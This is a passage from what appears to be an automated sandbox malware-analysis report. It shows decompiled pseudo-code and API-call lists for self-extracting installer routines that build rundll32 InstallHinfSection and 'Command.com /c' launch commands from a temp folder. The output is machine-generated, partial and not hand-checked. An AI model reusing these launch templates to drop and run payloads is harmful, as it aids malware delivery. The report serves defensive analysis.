                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00DE8C42), ref: 00DE3F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00DE8C42), ref: 00DE3F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00DE8C42), ref: 00DE3FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                        • API String ID: 1032054927-1894669795
                                                                                                                                                                                                        • Opcode ID: f5fb54f58b40c798f2dca97a2ea7558805f8fdc94ccc84d50dfe097ca0a1d322
                                                                                                                                                                                                        • Instruction ID: 8bdce6b880f53b3f042c8cea33503f2203b52d0ce9748f86f63450aad66bb912
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5fb54f58b40c798f2dca97a2ea7558805f8fdc94ccc84d50dfe097ca0a1d322
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6B1A070A043C19BD720BF268C89B7AB6E4EF84750F14092DFA89DB290DB74C944CB76
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00DE1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                        				CHAR* _t155;
                                                                                                                                                                                                        				CHAR* _t156;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t48 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                        				_t108 = __ecx;
                                                                                                                                                                                                        				_v1564 = _a4;
                                                                                                                                                                                                        				_v1560 = _a8;
                                                                                                                                                                                                        				E00DE1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                        				if(_v528 != 0x22) {
                                                                                                                                                                                                        					_t135 = " ";
                                                                                                                                                                                                        					_t53 =  &_v528;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t135 = "\"";
                                                                                                                                                                                                        					_t53 =  &_v527;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t111 =  &_v1556;
                                                                                                                                                                                                        				_v1556 = _t53;
                                                                                                                                                                                                        				_t54 = E00DE1A84(_t111, _t135);
                                                                                                                                                                                                        				_t156 = _v1556;
                                                                                                                                                                                                        				_t151 = _t54;
                                                                                                                                                                                                        				if(_t156 == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_push(_t111);
                                                                                                                                                                                                        					E00DE1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        					E00DE658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t132 = _t156;
                                                                                                                                                                                                        					_t148 =  &(_t132[1]);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t105 =  *_t132;
                                                                                                                                                                                                        						_t132 =  &(_t132[1]);
                                                                                                                                                                                                        					} while (_t105 != 0);
                                                                                                                                                                                                        					_t111 = _t132 - _t148;
                                                                                                                                                                                                        					if(_t111 < 3) {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t106 = _t156[1];
                                                                                                                                                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						E00DE1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t138 = 0x2e;
                                                                                                                                                                                                        						_t57 = E00DE66C8(_t156, _t138);
                                                                                                                                                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                        							_t139 = 0x2e;
                                                                                                                                                                                                        							_t115 = _t156;
                                                                                                                                                                                                        							_t58 = E00DE66C8(_t115, _t139);
                                                                                                                                                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                        									E00DE1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(_t115);
                                                                                                                                                                                                        									_t108 = 0x400;
                                                                                                                                                                                                        									E00DE1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                        										E00DE16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                        										E00DE16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = _t156;
                                                                                                                                                                                                        								 *_t156 = 0;
                                                                                                                                                                                                        								E00DE2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                        								goto L53;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t108 = "Command.com /c %s";
                                                                                                                                                                                                        								_t125 = "Command.com /c %s";
                                                                                                                                                                                                        								_t145 = _t125 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t76 =  *_t125;
                                                                                                                                                                                                        									_t125 = _t125 + 1;
                                                                                                                                                                                                        								} while (_t76 != 0);
                                                                                                                                                                                                        								_t126 = _t125 - _t145;
                                                                                                                                                                                                        								_t146 =  &_v268;
                                                                                                                                                                                                        								_t157 = _t146 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t77 =  *_t146;
                                                                                                                                                                                                        									_t146 = _t146 + 1;
                                                                                                                                                                                                        								} while (_t77 != 0);
                                                                                                                                                                                                        								_t140 = _t146 - _t157;
                                                                                                                                                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                                                        									E00DE171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                        									goto L53;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L43;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t140 = 0x525;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t60 =  &_v268;
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t140 = "[";
                                                                                                                                                                                                        								_v1556 = _t151;
                                                                                                                                                                                                        								_t90 = E00DE1A84( &_v1556, "[");
                                                                                                                                                                                                        								if(_t90 != 0) {
                                                                                                                                                                                                        									if( *_t90 != 0) {
                                                                                                                                                                                                        										_v1556 = _t90;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "]";
                                                                                                                                                                                                        									E00DE1A84( &_v1556, "]");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									L43:
                                                                                                                                                                                                        									_t60 = 0;
                                                                                                                                                                                                        									_t140 = 0x4b5;
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									L35:
                                                                                                                                                                                                        									_push(_t60);
                                                                                                                                                                                                        									E00DE44B9(0, _t140);
                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                        									goto L54;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t155 = _v1556;
                                                                                                                                                                                                        									_t92 = _t155;
                                                                                                                                                                                                        									if( *_t155 == 0) {
                                                                                                                                                                                                        										_t92 = "DefaultInstall";
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *0xde9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                        									 *_v1560 = 1;
                                                                                                                                                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xde1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                        										 *0xde9a34 =  *0xde9a34 & 0xfffffffb;
                                                                                                                                                                                                        										if( *0xde9a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E00DE171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0xde9a34 =  *0xde9a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E00DE1680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E00DE1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E00DE6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x00de1e05
                                                                                                                                                                                                        0x00de1e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1e12
                                                                                                                                                                                                        0x00de1e1b
                                                                                                                                                                                                        0x00de1e73
                                                                                                                                                                                                        0x00de1e21
                                                                                                                                                                                                        0x00de1e21
                                                                                                                                                                                                        0x00de1e28
                                                                                                                                                                                                        0x00de1e37
                                                                                                                                                                                                        0x00de1e3e
                                                                                                                                                                                                        0x00de1e52
                                                                                                                                                                                                        0x00de1e60
                                                                                                                                                                                                        0x00de1e60
                                                                                                                                                                                                        0x00de1e3e
                                                                                                                                                                                                        0x00de1e79
                                                                                                                                                                                                        0x00de1e7b
                                                                                                                                                                                                        0x00de1e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1d9b
                                                                                                                                                                                                        0x00de1d9b
                                                                                                                                                                                                        0x00de1da0
                                                                                                                                                                                                        0x00de1da2
                                                                                                                                                                                                        0x00de1da5
                                                                                                                                                                                                        0x00de1da5
                                                                                                                                                                                                        0x00de1da7
                                                                                                                                                                                                        0x00de1da8
                                                                                                                                                                                                        0x00de1dac
                                                                                                                                                                                                        0x00de1dae
                                                                                                                                                                                                        0x00de1db4
                                                                                                                                                                                                        0x00de1db7
                                                                                                                                                                                                        0x00de1db7
                                                                                                                                                                                                        0x00de1db9
                                                                                                                                                                                                        0x00de1dba
                                                                                                                                                                                                        0x00de1dbe
                                                                                                                                                                                                        0x00de1dc3
                                                                                                                                                                                                        0x00de1dce
                                                                                                                                                                                                        0x00de1dd2
                                                                                                                                                                                                        0x00de1deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1dd2
                                                                                                                                                                                                        0x00de1bf7
                                                                                                                                                                                                        0x00de1bfe
                                                                                                                                                                                                        0x00de1c07
                                                                                                                                                                                                        0x00de1d55
                                                                                                                                                                                                        0x00de1d5a
                                                                                                                                                                                                        0x00de1d5b
                                                                                                                                                                                                        0x00de1d5d
                                                                                                                                                                                                        0x00de1d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1c1b
                                                                                                                                                                                                        0x00de1c1b
                                                                                                                                                                                                        0x00de1c20
                                                                                                                                                                                                        0x00de1c2c
                                                                                                                                                                                                        0x00de1c33
                                                                                                                                                                                                        0x00de1c38
                                                                                                                                                                                                        0x00de1c3a
                                                                                                                                                                                                        0x00de1c3a
                                                                                                                                                                                                        0x00de1c40
                                                                                                                                                                                                        0x00de1c4b
                                                                                                                                                                                                        0x00de1c4b
                                                                                                                                                                                                        0x00de1c5d
                                                                                                                                                                                                        0x00de1c61
                                                                                                                                                                                                        0x00de1dd4
                                                                                                                                                                                                        0x00de1dd4
                                                                                                                                                                                                        0x00de1dd6
                                                                                                                                                                                                        0x00de1ddb
                                                                                                                                                                                                        0x00de1ddc
                                                                                                                                                                                                        0x00de1dde
                                                                                                                                                                                                        0x00de1d64
                                                                                                                                                                                                        0x00de1d64
                                                                                                                                                                                                        0x00de1d67
                                                                                                                                                                                                        0x00de1d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1c67
                                                                                                                                                                                                        0x00de1c67
                                                                                                                                                                                                        0x00de1c6d
                                                                                                                                                                                                        0x00de1c72
                                                                                                                                                                                                        0x00de1c74
                                                                                                                                                                                                        0x00de1c74
                                                                                                                                                                                                        0x00de1c8e
                                                                                                                                                                                                        0x00de1c99
                                                                                                                                                                                                        0x00de1cc0
                                                                                                                                                                                                        0x00de1cf8
                                                                                                                                                                                                        0x00de1d07
                                                                                                                                                                                                        0x00de1d23
                                                                                                                                                                                                        0x00de1d09
                                                                                                                                                                                                        0x00de1d14
                                                                                                                                                                                                        0x00de1d1b
                                                                                                                                                                                                        0x00de1d1b
                                                                                                                                                                                                        0x00de1d2b
                                                                                                                                                                                                        0x00de1d2d
                                                                                                                                                                                                        0x00de1d2d
                                                                                                                                                                                                        0x00de1d38
                                                                                                                                                                                                        0x00de1d39
                                                                                                                                                                                                        0x00de1d46
                                                                                                                                                                                                        0x00de1cc2
                                                                                                                                                                                                        0x00de1cc2
                                                                                                                                                                                                        0x00de1ccc
                                                                                                                                                                                                        0x00de1cce
                                                                                                                                                                                                        0x00de1cce
                                                                                                                                                                                                        0x00de1cdb
                                                                                                                                                                                                        0x00de1ce6
                                                                                                                                                                                                        0x00de1cee
                                                                                                                                                                                                        0x00de1cee
                                                                                                                                                                                                        0x00de1e89
                                                                                                                                                                                                        0x00de1e91
                                                                                                                                                                                                        0x00de1e92
                                                                                                                                                                                                        0x00de1e94
                                                                                                                                                                                                        0x00de1e97
                                                                                                                                                                                                        0x00de1ea4
                                                                                                                                                                                                        0x00de1ea4
                                                                                                                                                                                                        0x00de1c61
                                                                                                                                                                                                        0x00de1c07
                                                                                                                                                                                                        0x00de1bd3
                                                                                                                                                                                                        0x00de1b7b

APIs
• CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00DE1BE7
• GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00DE1BFE
• LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00DE1C57
• GetPrivateProfileIntA.KERNEL32 ref: 00DE1C88
• GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00DE1140,00000000,00000008,?), ref: 00DE1CB8
• GetShortPathNameA.KERNEL32 ref: 00DE1D1B
  • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
  • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
Strings
Memory Dump Source
• Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
Similarity
• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-2247772235
• Opcode ID: 5bdb258d83ef6490758e9dbb4b63837c3ab7005b35a85f21b99016198295535c
• Instruction ID: cafb848776640926ae7b353c6e081240d70aa1968f9b4cce17169d86ad17a59c
• Opcode Fuzzy Hash: 5bdb258d83ef6490758e9dbb4b63837c3ab7005b35a85f21b99016198295535c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DA13978B003D45BEB20BB26CC45BEA7769DB55310F180299F595E72C0DBB09E85CB70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

Control-flow Graph
[Figure: control-flow graph of the function at de2f1d; legend: Executed / Not Executed]
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00DE2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0xde8a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E00DE5164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E00DE6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E00DE55A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E00DE658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0xdea288("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0xde8a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0xde8a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0xde8d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0xde8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0xde9a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E00DE256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0xde8a24; // 0x0
                                                                                                                                                                                                        									 *0xde9a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0xde8a38;
                                                                                                                                                                                                        										if( *0xde8a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E00DE4169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0xde9a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E00DE3BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0xde8a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E00DE3B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E00DE44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0xde9a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00DE621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0xde8a24;
                                                                                                                                                                                                        				if( *0xde8a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E00DE3A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00DE51E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0xde8a38;
                                                                                                                                                                                                        				if( *0xde8a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00DE2F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00DE2FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00DE2FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 00DE2FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00DE2FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00DE301C
